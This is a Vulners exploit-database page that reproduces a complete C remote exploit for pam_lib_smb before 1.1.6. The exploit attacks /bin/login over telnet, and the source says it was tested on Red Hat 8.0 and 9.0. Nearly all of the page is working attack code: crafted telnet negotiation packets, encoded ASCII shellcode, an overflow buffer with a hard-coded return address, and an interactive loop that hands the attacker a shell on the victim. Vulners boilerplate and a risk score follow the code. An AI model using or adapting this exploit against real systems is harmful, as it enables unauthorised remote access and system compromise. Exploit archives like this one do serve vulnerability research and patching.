Vulners
Lucene search
Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit
===================================================
Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit
===================================================
/*
* Linux pam_lib_smb < 1.1.6 /bin/login exploit
* by vertex
*
* Tested on Redhat 8.0, 9.0
*
*
* Advisory at
* http://us2.samba.org/samba/ftp/pam_smb/
*
* code based on : UC_login.c
* SunOS 5.6,5.7,5.8 remote /bin/login root exploit
* [mikecc/unixclan]
*
* =============================================================
* In order to use pam_lib_smb, need to add following line on top
* of /etc/pam.d/login
*
* auth required /lib/security/pam_smb_auth.so
*
* And config the /etc/pam_smb.conf correctly.
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>
/* first negotiate */
/* packet capture by ethereal */
char packet_1[] = {
0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb,
0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21, 0xff,
0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,
0xff, 0xfb, 0x23 };
char packet_2[] = {
0xff, 0xfa, 0x1f, 0x00, 0x62, 0x00, 0x22, 0xff,
0xf0, 0xff, 0xfa, 0x20, 0x00, 0x33, 0x38, 0x34,
0x30, 0x30, 0x2c, 0x33, 0x38, 0x34, 0x30, 0x30,
0xff, 0xf0, 0xff, 0xfa, 0x23, 0x00, 0x6c, 0x69,
0x64, 0x73,
/* in between ,adding sc */
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa,
0x27, 0x00, 0x03, 0x58, 0x41, 0x55, 0x54, 0x48,
0x4f, 0x52, 0x49, 0x54, 0x59, 0x01, 0x2f, 0x68,
0x6f, 0x6d, 0x65, 0x2f, 0x78, 0x69, 0x65, 0x2f,
0x2e, 0x58, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72,
0x69, 0x74, 0x79, 0x00, 0x44, 0x49, 0x53, 0x50,
0x4c, 0x41, 0x59, 0x01,
};
char packet_2_1[]={
0x6c, 0x69, 0x64, 0x73,
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 0x18, 0x00,
0x58, 0x54, 0x45, 0x52, 0x4d, 0xff, 0xf0 };
/* here is the TERM value */
/*
*/
void login(int);
void negotiate(int);
void sendstr(int,char *,int);
void wont(int sd,int opt);
void will(int sd,int opt);
void cmd(int sd,int opt);
/* ascii shellcode by shellforge (by phillipe biodi)*/
unsigned char sc[] =
"hAAAAX5AAAAHPPPPPPPPahA000X5nCX0PhA004X5nRYZPh0A"
"DAX5owxnPTYI19II19h0200X5U9knPTYII19I19hA000X5sO"
"kBPTY19I19I19h4000X59cF4PTY19II19I19h0000X5000FP"
"TY19I19h0002X500w9PTYI19I19h0A00X5uR00PTYII19I19"
"h04AAX5ByVyPTY19II19I19h600AX59FMVPTY19I19I19h00"
"0AX500LZPTY19II19h00E0X5Btz0PTYII19hA4A0X5R8p9PT"
"Y19I19II19h0D20X5Lx8LPTY19h0000X5000kPh00A0X5fcV"
"0PTYI19I19h00B0X5eFXgPTYI19II19\xff\xff\xe4";
int main(int argc,char **argv)
{
struct sockaddr_in sock;
struct hostent *pHe;
int sd;
short port = -1;
int x;
char *host = NULL;
char *user = NULL;
char exp[1024];
int a;
char *default_port = "23";
printf("linux_pam_smb\n");
printf("Linux lib_pam_smb < 1.1.6 /bin/login remote exploit\n");
printf("[vertex//lids/org]\n\n");
if (argc < 2)
{
printf("%s -h <victim> [-p port] \n",argv[0]);
return 0;
}
while ((a = getopt(argc,argv,"h:p:u:")) != -1)
{
switch (a)
{
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
default:
printf("[-] invalid option.\n");
break;
}
}
if (host == NULL)
{
printf("[-] must specify a host to attack\n");
return 0;
}
if (port < 0)
port = atoi(default_port);
if ((pHe = gethostbyname(host)) == NULL)
{
printf("Host lookup error.\n");
return 0;
}
printf("[*] attacking %s:%d\n",host,port);
printf("[*] opening socket\n");
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("[-] could not create socket");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
{
printf("[-] failed to connect to %s\n",host);
return 0;
}
printf("[*] connected!\n");
printf("[*] Begin negotiate... \n");
negotiate(sd);
printf("[*] Login... \n");
login(sd);
return 0;
}
void login(int sd)
{
char buf[1024];
char exploit_buf[172];
char cx[3]="\r\n\0";
int x;
fd_set rset;
memset(exploit_buf,'\0',172);
/* let's jump to 0xbffffe30 */
/* eb 30 fe ff bf */
x = 0;
exploit_buf[x++]=0x68;
/* push 0xbffffe30 */
/* shellcode address */
exploit_buf[x++]=0x30;
exploit_buf[x++]=0xfe;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xbf;
exploit_buf[x++]=0xbf;
/* ret */
exploit_buf[x++]=0xc3;
memset(exploit_buf+x,'A',150);
x+=150;
/* will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f libc-2.3.2 */
/* at this address it is
pop $exx
pop $exx
ret
*/
exploit_buf[x++]=0xb5;
exploit_buf[x++]=0xd4;
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf, "xie\r\n\0");
printf("[*] sending username \n");
sendstr(sd,buf,strlen(buf));
sleep(1);
printf("[*] sending password\n");
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf, exploit_buf);
strcat(buf,"\r\n\0");
sendstr(sd,buf,strlen(buf));
sleep(2);
fflush(stdout);
FD_ZERO(&rset);
while (1)
{
FD_SET(sd,&rset);
FD_SET(0,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(-1);
}
fprintf(stderr,"%s",buf);
}
if (FD_ISSET(0,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(0,buf,sizeof(buf)-1)) > 0)
{
write(sd,buf,x);
}
}
}
}
/*
* telnet negotiation needed for
* talking with the telnet protocol
*/
void negotiate(int sd)
{
char buf[1024];
char nop[64];
int len;
sendstr(sd, packet_1,sizeof(packet_1));
sleep(2);
memset(buf,'\0',sizeof(buf));
memset(nop,'A',sizeof(nop));
memcpy(buf,packet_2,sizeof(packet_2));
/* adding NOP */
memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
/* shellcode */
memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
/* left packet */
memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packet_2_1));
len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
sendstr(sd, buf, len);
sleep(1);
/* wont echo */
wont(sd,TELOPT_ECHO);
sleep(1);
/* do echo */
cmd(sd,TELOPT_ECHO);
sleep(2);
}
/*
* send a telnet WONT
*
* structure of a telnet WONT is:
* 1. IAC
* 2. WONT
* 3. what you wont do
* (all of the above are found in arpa/telnet.h)
*/
void wont(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WONT,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
* send a telnet WILL
*
* structure of a telnet WILL is:
* 1. IAC
* 2. WILL
* 3. what you will do
* (all of the above are found in arpa/telnet.h)
*/
void will(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WILL,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
void cmd(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c\xfd%c",IAC,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
*
*/
void sendstr(int sd,char *str,int length)
{
write(sd,str,length);
sleep(1);
}
# 0day.today [2018-03-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Aug 2003 00:00Current
7.1High risk
Vulners AI Score7.1